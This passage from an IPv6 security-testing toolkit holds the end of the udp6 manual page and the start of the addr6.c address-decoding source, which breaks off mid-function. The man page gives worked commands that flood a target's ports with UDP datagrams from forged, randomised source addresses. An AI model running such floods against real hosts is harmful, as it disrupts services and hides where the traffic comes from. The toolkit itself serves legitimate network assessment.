.BI \-Z\ DATA ,\ \-\-data\ DATA This option is used to specify the UDP payload. It will typically include an application-layer request. Note: the string used for the DATA parameter can contain the "\\r" and "\\n" C\-style escape senquenced for representing "carriage return" and "line feed" (respectively). As an example, this option could be employed to send an HTTP request if set as '\-\-data "GET / HTTP/1.0\\r\\n\\r\\n"'. .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ LINK_ADDR ,\ \-\-block\-link\-src\ LINK_ADDR This option sets a block filter for the incoming packets, based on their link-layer Source Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-K\ LINK_ADDR ,\ \-\-block\-link\-dst\ LINK_ADDR This option sets a block filter for the incoming packets, based on their link-layer Destination Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ LINK_ADDR ,\ \-\-accept\-link\-src\ LINK_ADDR This option sets an accept filter for the incoming packets, based on their link-layer Source Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-G\ LINK_ADDR ,\ \-\-accept\-link\-dst\ LINK_ADDR This option sets an accept filter for the incoming packets, based on their link-layer Destination Address. The option must be followed by a link-layer address (currently, only Ethernet is supported). .TP .BI \-F\ N_SOURCES ,\ \-\-flood\-sources\ N_SOURCES This option instructs the tool to send multiple UDP datagrams with different Source Addresses. The number of different source addresses is specified as "\-F number". The Source Address of each UDP datagram is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix ::/0. .TP .BI \-T\ N_PORTS ,\ \-\-flood\-ports\ N_PORTS This option instructs the tool to send multiple UDP datagrams with different Source Ports. The Source Port of each UDP datagram is randomly selected from the whole port number space (0\-65535). .TP .BR \-l\| ,\ \-\-loop This option instructs the udp6 tool to send periodic UDP datagrams to the victim node. The amount of time to pause between sending UDP datagrams can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP .BR \-z\| ,\ \-\-sleep This option specifies the amount of time to pause between sending UDP datagrams (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP .BI \-r\ RATE ,\ \-\-rate\-limit\ RATE This option specifies the rate limit to use when performing a remote address scan. "RATE" should be specified as "xbps" or "xpps" (with "x" being an unsigned integer), for rate-limits in bits per second or packets per second, respectively. .TP .BR \-L\| ,\ \-\-listen This instructs the udp6 tool to operate in listening mode (possibly after attacking a given node). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP .BI \-p\ PROBE_MODE ,\ \-\-probe\-mode\ PROBE_MODE This option instructs th too to operate in probe mode. The specific probe mode is specified as an argument to this option (currently, only "script" mode is supported). In probe mode, .B the udp6 sends probe datagrams, and waits for response packets. The response packets are decoded based on the selected probe mode. In the "script" probe mode, the tool decodes UDP datagrams as follows: RESPONSE:RESPONSE_TYPE:RESPONSE_DECODE... Where the string RESPONSE is fixed, and RESPONSE_TYPE indicates the response received. As of this version of the tool, the following RESPONSE_TYPE values are supported: \+ UDP6: Indicates that the tool received a UDP/IPv6 packet \+ TIMEOUT: Indicates that the tool received no response Possibe output lines of the tool are: RESPONSE:TIMEOUT: RESPONSE:UDP6: Note: Future versions of the tool will also decode ICMPv6 error messages, and will include additional data regarding the incoming UDP datagrams (e.g., payload size). .TP .BR \-v\| ,\ \-\-verbose This option instructs the udp6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP .BR \-h\| ,\ \-\-help Print help information for the .B udp6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B udp6 tool. \fBExample #1\fR # udp6 -s fc00:1::/64 \-d fc00:1::1 \-a 22 \-F 100 \-l \-z 1 \-v In this example the .B udp6 tool is essentially employed to flood port number 22 of the host fc00:1::1. The tool sends UDP datagrams from the prefix fc00:1::/64 (as specified by the "\-s" option) to port 22 (specified by the "\-a" option) at the destination address fc00:1::1 (specified by the "\-d" option). The tool sends UDP datagrams from 100 different addresses (as specified by the "\-F" option) every one second (as specified by the "\-l" and "\-z" options). The tool will be verbose (as specified by the "\-v" option). \fBExample #3\fR # udp6 \-d fc00:1::1 \-a 80 \-l \-r 1pps \-v \-\-data "GET / HTTP/1.0\\r\\n\\r\\n" Flood the target system (fc00:1::1) with UDP datagrams at a rate of one packet per second. Each UDP datagram will contain (in the payload) the string specified via the "\-\-data" option. \fBExample #4\fR # udp6 \-i eth0 \-d fc00:1::1 \-a 80 \-L \-s fc00:1::/112 \-l \-r 1000pps \-\-udp\-flags auto \-v \-\-data "GET / HTTP/1.0\\r\\n\\r\\n" \-\-flood\-ports 10 \-\-window\-mode close Flood the target node (fc00:1::1) with UDP connections (on port 80). On each connection that is established, an HTTP request is sent, and the UDP window is immediately closed. For each forged IPv6 source address ten different UDP source ports are randomized. The bandwidth of the attack is limited to 1000 pps. \fBExample #5\fR # udp6 \-d fc00:1::1 \-a 80 \-\-udp\-flags A \-\-dst-opt-hdr 8 \-\-payload\-size 50 \-\-probe\-mode script Send a probe UDP datagram to UDP port 80 at fc00:1::1. The probe packet consists of an IPv6 packet with a Destination Options header of 8 bytes, and an IPv6 payload consisting of a UDP datagram with the ACK bit set, and 50 data bytes. The probe mode is "script". .SH AUTHOR The .B udp6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-2.0+ds.1/tools/000077500000000000000000000000001254360455000155525ustar00rootroot00000000000000ipv6toolkit-2.0+ds.1/tools/addr6.c000066400000000000000000001114751254360455000167270ustar00rootroot00000000000000/* * addr6: A tool to decode IPv6 addresses * * Copyright (C) 2013-2015 Fernando Gont (fgont@si6networks.com) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make addr6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include "addr6.h" #include "ipv6toolkit.h" #include "libipv6.h" void usage(void); void print_help(void); void stat_ipv6_address(struct decode6 *, struct stats6 *); void print_dec_address_script(struct decode6 *); int init_host_list(struct hashed_host_list *); uint16_t key(struct hashed_host_list *, struct in6_addr *); struct hashed_host_entry * add_hashed_host_entry(struct hashed_host_list *, struct in6_addr *); unsigned int is_ip6_in_hashed_list(struct hashed_host_list *, struct in6_addr *); void print_stats(struct stats6 *); unsigned char stdin_f=FALSE, addr_f=FALSE, verbose_f=FALSE, decode_f=FALSE, print_unique_f=FALSE; unsigned char stats_f=FALSE, filter_f=FALSE, canonic_f=FALSE, reverse_f=FALSE; char line[MAX_LINE_SIZE]; extern char *optarg; extern int optind, opterr, optopt; int main(int argc, char **argv){ struct decode6 addr; struct stats6 stats; struct hashed_host_list hlist; int r; char *ptr, *pref, *charptr, *lasts; char pv6addr[INET6_ADDRSTRLEN]; unsigned int accept_type=0, block_type=0, accept_scope=0, block_scope=0, accept_itype=0, block_itype=0; unsigned int accept_utype=0, block_utype=0; unsigned char accepted_f=0, acceptfilters_f=0; /* Block Filters */ struct in6_addr block[MAX_BLOCK]; uint8_t blocklen[MAX_BLOCK]; unsigned int nblock=0; /* Accept Filters */ struct in6_addr accept[MAX_ACCEPT]; uint8_t acceptlen[MAX_ACCEPT]; unsigned int naccept=0; static struct option longopts[] = { {"address", required_argument, 0, 'a'}, {"stdin", no_argument, 0, 'i'}, {"print-canonic", no_argument, 0, 'c'}, {"print-decode", no_argument, 0, 'd'}, {"print-reverse", no_argument, 0, 'r'}, {"print-stats", no_argument, 0, 's'}, {"print-unique", no_argument, 0, 'q'}, {"accept", required_argument, 0, 'j'}, {"accept-type", required_argument, 0, 'b'}, {"accept-scope", required_argument, 0, 'k'}, {"accept-utype", required_argument, 0, 'w'}, {"accept-iid", required_argument, 0, 'g'}, {"block", required_argument, 0, 'J'}, {"block-type", required_argument, 0, 'B'}, {"block-scope", required_argument, 0, 'K'}, {"block-utype", required_argument, 0, 'W'}, {"block-iid", required_argument, 0, 'G'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 }, }; char shortopts[]= "a:icrdsqj:b:k:w:g:J:B:K:W:G:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } release_privileges(); while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1 && r != '?') { option= r; switch(option){ case 'a': if( inet_pton(AF_INET6, optarg, &(addr.ip6)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } addr_f=1; break; case 'i': /* Read from stdin */ stdin_f=1; break; case 'c': /* Print addresses in canonic form */ canonic_f=1; break; case 'd': /* Decode IPv6 addresses */ decode_f=1; break; case 'r': /* Print addresses in reversed form */ reverse_f=1; break; case 'j': /* IPv6 Address (accept) filter */ if(naccept > MAX_ACCEPT){ puts("Too many IPv6 Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Address (accept) filter number %u.\n", naccept+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &accept[naccept]) <= 0){ printf("Error in IPv6 Address (accept) filter number %u.\n", naccept+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ acceptlen[naccept] = 128; } else{ acceptlen[naccept] = atoi(charptr); if(acceptlen[naccept]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", naccept+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&accept[naccept], acceptlen[naccept]); naccept++; acceptfilters_f=1; filter_f=1; break; case 'J': /* IPv6 Address (block) filter */ if(nblock >= MAX_BLOCK){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Address (block) filter number %u.\n", nblock+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &block[nblock]) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", nblock+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ blocklen[nblock] = 128; } else{ blocklen[nblock] = atoi(charptr); if(blocklen[nblock]>128){ printf("Length error in IPv6 Address (block) filter number %u.\n", nblock+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&block[nblock], blocklen[nblock]); nblock++; filter_f=1; break; case 'b': /* Accept type filter */ if(strncmp(optarg, "unicast", MAX_TYPE_SIZE) == 0){ accept_type |= IPV6_UNICAST; } else if(strncmp(optarg, "unspec", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ accept_type |= IPV6_UNSPEC; } else if(strncmp(optarg, "multicast", MAX_TYPE_SIZE) == 0){ accept_type |= IPV6_MULTICAST; } else{ printf("Unknown address type '%s' in accept type filter\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f=1; break; case 'B': /* Block type filter */ if(strncmp(optarg, "unicast", MAX_TYPE_SIZE) == 0){ block_type |= IPV6_UNICAST; } else if(strncmp(optarg, "unspec", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ block_type |= IPV6_UNSPEC; } else if(strncmp(optarg, "multicast", MAX_TYPE_SIZE) == 0){ block_type |= IPV6_MULTICAST; } else{ printf("Unknown address type '%s' in block type filter\n", optarg); exit(EXIT_FAILURE); } filter_f=1; break; case 'k': /* Accept scope filter */ if(strncmp(optarg, "reserved", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_RESERVED; } else if(strncmp(optarg, "interface", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "interface-local", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_INTERFACE; } else if(strncmp(optarg, "link", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_LINK; } else if(strncmp(optarg, "admin", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "admin-local", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_ADMIN; } else if(strncmp(optarg, "site", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_SITE; } else if(strncmp(optarg, "organization", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "organization-local", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_ORGANIZATION; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_GLOBAL; } else if(strncmp(optarg, "unassigned", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_UNASSIGNED; } else if(strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ accept_scope |= SCOPE_UNSPECIFIED; } else{ printf("Unknown address scope '%s' in accept scope filter\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f=1; break; case 'K': /* Block scope filter */ if(strncmp(optarg, "reserved", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_RESERVED; } else if(strncmp(optarg, "interface", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "interface-local", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_INTERFACE; } else if(strncmp(optarg, "link", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_LINK; } else if(strncmp(optarg, "admin", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "admin-local", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_ADMIN; } else if(strncmp(optarg, "site", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_SITE; } else if(strncmp(optarg, "organization", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "organization-local", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_ORGANIZATION; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_GLOBAL; } else if(strncmp(optarg, "unassigned", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_UNASSIGNED; } else if(strncmp(optarg, "unspecified", MAX_TYPE_SIZE) == 0){ block_scope |= SCOPE_UNSPECIFIED; } else{ printf("Unknown address scope '%s' in block scope filter\n", optarg); exit(EXIT_FAILURE); } filter_f=1; break; case 'w': /* Accept unicast type filter */ if(strncmp(optarg, "loopback", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_LOOPBACK; } else if(strncmp(optarg, "ipv4-compat", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ipv4-compatible", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_V4COMPAT; } else if(strncmp(optarg, "ipv4-mapped", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_V4MAPPED; } else if(strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_LINKLOCAL; } else if(strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_SITELOCAL; } else if(strncmp(optarg, "unique-local", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ula", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_UNIQUELOCAL; } else if(strncmp(optarg, "6to4", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_6TO4; } else if(strncmp(optarg, "teredo", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_TEREDO; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "normal", MAX_TYPE_SIZE) == 0){ accept_utype |= UCAST_GLOBAL; } else{ printf("Unknown unicast address type '%s' in accept unicast address type filter\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f=1; break; case 'W': /* Block unicast type filter */ if(strncmp(optarg, "loopback", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_LOOPBACK; } else if(strncmp(optarg, "ipv4-compat", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ipv4-compatible", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_V4COMPAT; } else if(strncmp(optarg, "ipv4-mapped", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_V4MAPPED; } else if(strncmp(optarg, "link-local", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_LINKLOCAL; } else if(strncmp(optarg, "site-local", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_SITELOCAL; } else if(strncmp(optarg, "unique-local", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ula", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_UNIQUELOCAL; } else if(strncmp(optarg, "6to4", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_6TO4; } else if(strncmp(optarg, "teredo", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_TEREDO; } else if(strncmp(optarg, "global", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "normal", MAX_TYPE_SIZE) == 0){ block_utype |= UCAST_GLOBAL; } else{ printf("Unknown unicast address type '%s' in block unicast address type filter\n", optarg); exit(EXIT_FAILURE); } filter_f=1; break; case 'g': /* Accept IID filter */ if(strncmp(optarg, "ieee", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_MACDERIVED; } else if(strncmp(optarg, "isatap", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ISATAP", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_ISATAP; } else if(strncmp(optarg, "ipv4-32", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDIPV4; } else if(strncmp(optarg, "ipv4-64", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "ipv4-all", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDIPV4; accept_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "embed-port", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDPORT; } else if(strncmp(optarg, "embed-port-rev", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-rev", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "embed-port-all", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-all", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_EMBEDDEDPORT; accept_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "low-byte", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "lowbyte", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_LOWBYTE; } else if(strncmp(optarg, "byte-pattern", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "bytepattern", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_PATTERN_BYTES; } else if(strncmp(optarg, "random", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "randomized", MAX_TYPE_SIZE) == 0){ accept_itype |= IID_RANDOM; } else{ printf("Unknown IID type '%s' in accept IID type filter.\n", optarg); exit(EXIT_FAILURE); } acceptfilters_f=1; filter_f = 1; break; case 'G': /* Block IID filter */ if(strncmp(optarg, "ieee", MAX_TYPE_SIZE) == 0){ block_itype |= IID_MACDERIVED; } else if(strncmp(optarg, "isatap", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "ISATAP", MAX_TYPE_SIZE) == 0){ block_itype |= IID_ISATAP; } else if(strncmp(optarg, "ipv4-32", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDIPV4; } else if(strncmp(optarg, "ipv4-64", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "ipv4-all", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDIPV4; block_itype |= IID_EMBEDDEDIPV4_64; } else if(strncmp(optarg, "embed-port", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDPORT; } else if(strncmp(optarg, "embed-port-rev", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-rev", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "embed-port-all", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "port-all", MAX_TYPE_SIZE) == 0){ block_itype |= IID_EMBEDDEDPORT; block_itype |= IID_EMBEDDEDPORTREV; } else if(strncmp(optarg, "low-byte", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "lowbyte", MAX_TYPE_SIZE) == 0){ block_itype |= IID_LOWBYTE; } else if(strncmp(optarg, "byte-pattern", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "bytepattern", MAX_TYPE_SIZE) == 0){ block_itype |= IID_PATTERN_BYTES; } else if(strncmp(optarg, "random", MAX_TYPE_SIZE) == 0 || strncmp(optarg, "randomized", MAX_TYPE_SIZE) == 0){ block_itype |= IID_RANDOM; } else{ printf("Unknown IID type '%s' in block IID type filter.\n", optarg); exit(EXIT_FAILURE); } filter_f = 1; break; case 's': /* Generate IPv6 Address Statistics */ stats_f = 1; break; case 'q': /* Filter duplicate addresses */ print_unique_f = 1; break; case 'v': /* Be verbose */ verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(stdin_f && addr_f){ puts("Cannot specify both '-a' and '-s' at the same time (try only one of them at a time)"); exit(EXIT_FAILURE); } if(!stdin_f && !addr_f){ puts("Must specify an IPv6 address with '-a', or set '-s' to read addresses from stdin"); exit(EXIT_FAILURE); } if(stats_f && !stdin_f){ puts("Cannot obtain statistics based on a single IPv6 address (should be using '-i')"); exit(EXIT_FAILURE); } /* By default, addr6 decodes IPv6 addresses */ if(!print_unique_f && !filter_f && !stats_f && !canonic_f && !reverse_f) decode_f=1; if(print_unique_f){ if(!init_host_list(&hlist)){ puts("Not enough memory when initializing internal host list"); exit(EXIT_FAILURE); } } if(stats_f){ memset(&stats, 0, sizeof(stats)); } if(stdin_f){ while(fgets(line, MAX_LINE_SIZE, stdin) != NULL){ r= read_prefix(line, Strnlen(line, MAX_LINE_SIZE), &ptr); if(r==1){ if ( inet_pton(AF_INET6, ptr, &(addr.ip6)) <= 0){ if(decode_f) puts("Error: Invalid IPv6 address"); continue; } if(filter_f || decode_f || stats_f) decode_ipv6_address(&addr); if(nblock){ if(match_ipv6(block, blocklen, nblock, &(addr.ip6))){ continue; } } if(block_type || block_scope || block_itype || block_utype){ if( (block_type & addr.type) || (block_utype & addr.subtype)\ || (block_scope & addr.scope) || (block_itype & addr.iidtype)) continue; } accepted_f=0; if(naccept){ if(match_ipv6(accept, acceptlen, naccept, &(addr.ip6))) accepted_f= 1; } if(!accepted_f && (accept_type || accept_scope || accept_itype || accept_utype)){ if( (accept_type & addr.type) || (accept_utype & addr.subtype)\ || (accept_scope & addr.scope) || (accept_itype & addr.iidtype)) accepted_f=1; } if(acceptfilters_f && !accepted_f) continue; if(print_unique_f){ if(is_ip6_in_hashed_list(&hlist, &(addr.ip6))){ continue; } else{ if(add_hashed_host_entry(&hlist, &(addr.ip6)) == NULL){ puts("Not enough memory (or hit internal artificial limit) when storing IPv6 address in memory"); exit(EXIT_FAILURE); } } } if(stats_f){ stat_ipv6_address(&addr, &stats); } else if(decode_f){ print_dec_address_script(&addr); } else if(reverse_f){ print_ipv6_address_rev(&(addr.ip6)); } else{ if(inet_ntop(AF_INET6, &(addr.ip6), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } printf("%s\n", pv6addr); } } } if(stats_f){ print_stats(&stats); } } else{ /* If we were not asked to decode the address, we should print it on stdout */ if(decode_f){ decode_ipv6_address(&addr); print_dec_address_script(&addr); } else if(canonic_f){ if(print_ipv6_address("", &(addr.ip6)) != EXIT_SUCCESS) exit(EXIT_FAILURE); } else if(reverse_f){ if(print_ipv6_address_rev(&(addr.ip6)) != EXIT_SUCCESS) exit(EXIT_FAILURE); } } exit(EXIT_SUCCESS); } /* * Function: stat_ipv6_address() * * Incorporate address in IPv6 address statistics */ void stat_ipv6_address(struct decode6 *addr, struct stats6 *stats){ (stats->total)++; switch(addr->type){ case IPV6_UNSPEC: (stats->ipv6unspecified)++; break; case IPV6_MULTICAST: (stats->ipv6multicast)++; switch(addr->subtype){ case MCAST_PERMANENT: (stats->mcastpermanent)++; break; case MCAST_NONPERMANENT: (stats->mcastnonpermanent)++; break; case MCAST_INVALID: (stats->mcastinvalid)++; break; case MCAST_UNICASTBASED: (stats->mcastunicastbased)++; break; case MCAST_EMBEDRP: (stats->mcastembedrp)++; break; case MCAST_UNKNOWN: (stats->mcastunknown)++; break; } if(addr->subtype != MCAST_UNKNOWN){ switch(addr->scope){ case SCOPE_RESERVED: (stats->mscopereserved)++; break; case SCOPE_INTERFACE: (stats->mscopeinterface)++; break; case SCOPE_LINK: (stats->mnscopelink)++; break; case SCOPE_ADMIN: (stats->mscopeadmin)++; break; case SCOPE_SITE: (stats->mscopesite)++; break; case SCOPE_ORGANIZATION: (stats->mscopeorganization)++; break; case SCOPE_GLOBAL: (stats->mscopeglobal)++; break; case SCOPE_UNASSIGNED: (stats->mscopeunassigned)++; break; } } break; case IPV6_UNICAST: (stats->ipv6unicast)++; switch(addr->subtype){ case UCAST_LOOPBACK: (stats->ucastloopback)++; break; case UCAST_V4MAPPED: (stats->ucastv4mapped)++; break; case UCAST_V4COMPAT: (stats->ucastv4compat)++; break; case UCAST_LINKLOCAL: (stats->ucastlinklocal)++; break; case UCAST_SITELOCAL: (stats->ucastsitelocal)++; break; case UCAST_UNIQUELOCAL: (stats->ucastuniquelocal)++; break; case UCAST_6TO4: (stats->ucast6to4)++; break; case UCAST_TEREDO: (stats->ucastteredo)++; break; case UCAST_GLOBAL: (stats->ucastglobal)++; break; } if(addr->subtype==UCAST_GLOBAL || addr->subtype==UCAST_V4MAPPED || addr->subtype==UCAST_V4COMPAT || \ addr->subtype==UCAST_LINKLOCAL || addr->subtype==UCAST_SITELOCAL || addr->subtype==UCAST_UNIQUELOCAL ||\ addr->subtype == UCAST_6TO4){ switch(addr->iidtype){ case IID_MACDERIVED: (stats->iidmacderived)++; break; case IID_ISATAP: (stats->iidisatap)++; break; case IID_EMBEDDEDIPV4: switch(addr->iidsubtype){ case IID_EMBEDDEDIPV4_32: (stats->iidembeddedipv4_32)++; break; case IID_EMBEDDEDIPV4_64: (stats->iidembeddedipv4_64)++; break; } break; case IID_EMBEDDEDPORT: (stats->iidembeddedport)++; break; case IID_EMBEDDEDPORTREV: (stats->iidembeddedportrev)++; break; case IID_LOWBYTE: (stats->iidlowbyte)++; break; case IID_PATTERN_BYTES: (stats->iidpatternbytes)++; break; case IID_RANDOM: (stats->iidrandom)++; break; } } break; } } /* * Function: print_dec_address_script() * * Print the IPv6 address decode obtained by decode_ipv6_address */ void print_dec_address_script(struct decode6 *addr){ unsigned int r; char *nullstring=""; char *unspecified="unspecified"; char iidsubtypebuffer[9]; char *ipv6unspec="unspecified"; char *ipv6multicast="multicast"; char *ipv6unicast="unicast"; char *ucastloopback="loopback"; char *ucastv4mapped="ipv4-mapped"; char *ucastv4compat="ipv4-compatible"; char *ucastlinklocal="link-local"; char *ucastsitelocal="site-local"; char *ucastuniquelocal="unique-local"; char *ucast6to4="6to4"; char *ucastteredo="teredo"; char *ucastglobal="global"; char *mcastpermanent="permanent"; char *mcastnonpermanent="non-permanent"; char *mcastinvalid="invalid"; char *mcastunicastbased="unicast-based"; char *mcastembedrp="embedded-rp"; char *mcastunknown="unknown"; char *iidmacderived="ieee-derived"; char *iidisatap="isatap"; char *iidmbeddedipv4="embedded-ipv4"; char 